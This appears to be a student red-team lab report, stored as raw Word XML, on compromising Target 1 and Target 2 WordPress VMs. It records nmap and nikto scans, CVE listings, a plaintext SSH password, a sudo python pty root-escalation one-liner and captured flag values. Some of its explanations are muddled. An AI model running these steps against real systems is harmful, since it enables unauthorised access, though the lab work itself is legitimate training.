        <w:jc w:val="left"/>
        <w:rPr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u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="3FAE397A" w14:textId="7AD4ACC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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ssh </w:t>
      </w:r>
      <w:hyperlink r:id="R31297b6503fa46da">
        <w:r w:rsidRPr="6E28B93C" w:rsidR="6E28B93C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steven@192.168.1.110</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="763D92A9" w14:textId="460CE968">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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pw: pink84 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="52DE7EC7" w14:textId="03CA85CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Then as Steven checking for privilege and escalating to root with Python.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="5EB9C847" w14:textId="2FC64739">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings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  - Commands: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="5A58D7F2" w14:textId="317B1261">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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proofErr w:type="spellStart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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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–l reveals user Steven may run /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/bin/python commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="11236F2D" w14:textId="6C1EC618">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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sudo python –c ‘import pty:pty.spawn(“/bin/bash”)’ - this reverse shells from Steven user to root privilege</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="4CD3A55D" w14:textId="4ED71123">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="226D5321" w14:textId="469E7D9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="7D92B8FB" w14:textId="58E482EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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>cat flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="13C57F71" w14:textId="5A386A3D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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="645ACC8A" wp14:anchorId="57EA7D5A">
            <wp:extent cx="4572000" cy="2647950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1268843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fb2a55d8aa40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8DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="4FF72922" w14:textId="5E9C10C9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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="55D9A0DE" wp14:anchorId="2B204235">
            <wp:extent cx="3152775" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1220287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17d8acdad14c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527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8DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="78567651" w14:textId="66C8D3E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2EBD15E3" wp14:anchorId="3AC14010">
            <wp:extent cx="4572000" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="624907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185bf0e3a242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8DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="7685689D" w14:textId="2CDA466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6E28B93C" w:rsidR="6E28B93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- </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="7A1B0DFF" wp14:anchorId="6CC63AD4">
            <wp:extent cx="4572000" cy="666750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1337062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616e31d94b4e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8DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="3EB29EA1" w14:textId="30A962C8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>
        <w:drawing>
          <wp:inline wp14:editId="1C30C5AF" wp14:anchorId="0E2AFA93">
            <wp:extent cx="4572000" cy="3848100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12448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ed1a24769c42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FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="362C94D3" w14:textId="3F0D51B2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54FF3FED" w:rsidR="54FF3FED">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Target 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="7EBE065C" w14:textId="3FB0D455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4FF3FED" w:rsidR="54FF3FE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Target 2</w:t>
      </w:r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exposes the same WordPress site as Target 1, but with better security hardening. Therefore, it must be exploited differently than Target 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="70888E1C" w14:textId="42010DA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>### Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="1B9CDF85" w14:textId="37A0791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54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="225CBE55" w14:textId="17B86FB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Name of VM: </w:t>
      </w:r>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FE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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="053C0D38" w14:textId="0B63F05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>OS: Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="50DC18FC" w14:textId="30997F2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>Purpose: Offensive Red Team</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="43308A62" w14:textId="1F40C1F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>IP Address: 192.168.1.115</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="151CE03C" w14:textId="22D5153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54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="5AEA442E" w14:textId="75B217BC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$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>sP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> 192.168.1.1-255</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="56E61EF7" w14:textId="7AC8D041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>
        <w:drawing>
          <wp:inline wp14:editId="0847CE3E" wp14:anchorId="2D3037ED">
            <wp:extent cx="4572000" cy="2733675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1281380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696f4a8df647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FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="6B0BFFC2" w14:textId="74B0604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>Nmap scan results for each machine reveal the below services and OS details:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="663418C8" w14:textId="63E5D2A1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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="1D687388" w14:textId="31C40A8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>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="40A6901A" w14:textId="552D06DF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$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> 192.168.1.115</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="7762F13D" w14:textId="7D2440E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>
        <w:drawing>
          <wp:inline wp14:editId="576EB6D4" wp14:anchorId="31560432">
            <wp:extent cx="4572000" cy="3028950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1645293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d410ecf0ab46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FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="706807A1" w14:textId="00EAAC6B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>```</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="77DEA1E0" w14:textId="384DD69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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="07AB048C" w14:textId="05F39C29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>This scan identifies the services below as potential points of entry:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="4946C48C" w14:textId="03BF392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>- Target 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="2E0196A2" w14:textId="503E240D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 - Port 22/tcp open ssh (service) OpenSSH 6.7p1 Debian 5+ deb8u4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="6A4197C7" w14:textId="37AB8E47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="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve">  - </w:t>
      </w:r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>Port 80/tcp open http (service) Apache httpd 2.4.10 ((Debian))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="06C7DAA3" w14:textId="11CB1FC0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="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve">  - </w:t>
      </w:r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>Port 111/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(service) 2-4 (RPC #100000)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="56A21221" w14:textId="569E3CD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="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve">  - </w:t>
      </w:r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>Port 139/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>netbios-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(service) Samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>smbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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3.X - 4.X</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="514E282C" w14:textId="530CE4CB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="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve">  - </w:t>
      </w:r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Port 445/tcp open </w:t>
      </w:r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>netbios-ssn</w:t>
      </w:r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(service) Samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>smbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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3.X - 4.X </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="1EDB4743" w14:textId="6A354BD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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="10325214" w14:textId="388E644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The following vulnerabilities were identified on Target 2:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="69E63E43" w14:textId="28E2331A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 - Remote Code Execution in </w:t>
      </w:r>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>PHPMailer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="1EC1D079" w14:textId="049A4968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 - Open SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="1DD069D0" w14:textId="33C58B5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="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve">  - </w:t>
      </w:r>
      <w:hyperlink r:id="R98c975bdffa1434c">
        <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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CVE-2017-15710 Apache httpd 2.4.10:</w:t>
        </w:r>
      </w:hyperlink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could be used as a DDos attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="3E08F06F" w14:textId="18F86099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noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="R08e2bfae36a8484d">
        <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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CVE-2017-8779 Exploit on open rpcbind:</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows remote attackers to cause a DOS via rpcbomb (crafted UDP packet to port 111)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="5AEE2BCE" w14:textId="5775133D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="R370e1a629f8046bc">
        <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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CVE-2020-10745 Samba NetBIOS:</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FE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vulnerable to remote code execution vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="4823C9E9" w14:textId="4B35975C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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="59BB3F99" w14:textId="305BAF0D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t xml:space="preserve"> following vulnerabilities were identified on </w:t>
      </w:r>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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24292F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Target 2</w:t>
      </w:r>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="13E72F10" w14:textId="45C4F5EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t xml:space="preserve">CVE-2016-10033 (Remote Code Execution Vulnerability in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>PHPMailer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t xml:space="preserve"> 5.2.16)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="4F7E15F8" w14:textId="68751269">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>Get access to the web services and search for a lot of confidential information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="1E3755CC" w14:textId="2E1C7FC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t xml:space="preserve">Exploiting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>PHPMail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t xml:space="preserve"> with back connection (reverse shell) from the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="5E38B67E" w14:textId="7D657D1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>Network Mapping and User Enumeration (WordPress site)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="60AAFAAD" w14:textId="174560C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>Nmap was used to discover open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="30B369AC" w14:textId="52118D6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>Able to discover open ports and tailor their attacks accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="16036918" w14:textId="352B4723">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>Weak Root Password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="5906E776" w14:textId="24FA185B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>The root login had a weak password and the attackers were able to discover it by guessing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="2F0DE850" w14:textId="7D07CE67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>Able to correctly guess a root's password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="0B11B5BF" w14:textId="7B178C3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>Misconfiguration of User Privileges/Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="4B660227" w14:textId="730E5966">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t xml:space="preserve">The attackers noticed that the root user has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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  <w:t xml:space="preserve"> privileges for python.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="3C3E5AE8" w14:textId="227D11AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val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</w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3F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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Able to utilize root’s python privileges in order to escalate for privilege to other folders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="23BE6346" w14:textId="30AA8A19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54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="15DF19F6" w14:textId="3827F8F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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="24937F5E" w14:textId="1CCA8E8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### Exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="6BA4F610" w14:textId="2646952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>The Red Team was able to penetrate `Target 2` and retrieve the following confidential data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="07C81BCF" w14:textId="634F7738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>- Target 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="39669964" w14:textId="763BF1D3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 - `flag1.txt`: 'a2c1f66d2b8051bd3a5874b5b6e43e21’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="65926550" w14:textId="262E4E5A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   - **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="04FBFC05" w14:textId="5BC5D9E3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     - Enumerated web server WordPress site with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> and a more </w:t>
      </w:r>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>in-depth</w:t>
      </w:r>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> enumeration with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> to create a list of exposed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>URL’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> from the Target HTTP server and gather version information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="2E8F6EC6" w14:textId="3061344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     - Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> –C all –h 192.168.1.115</w:t>
      </w:r>
    </w:p>
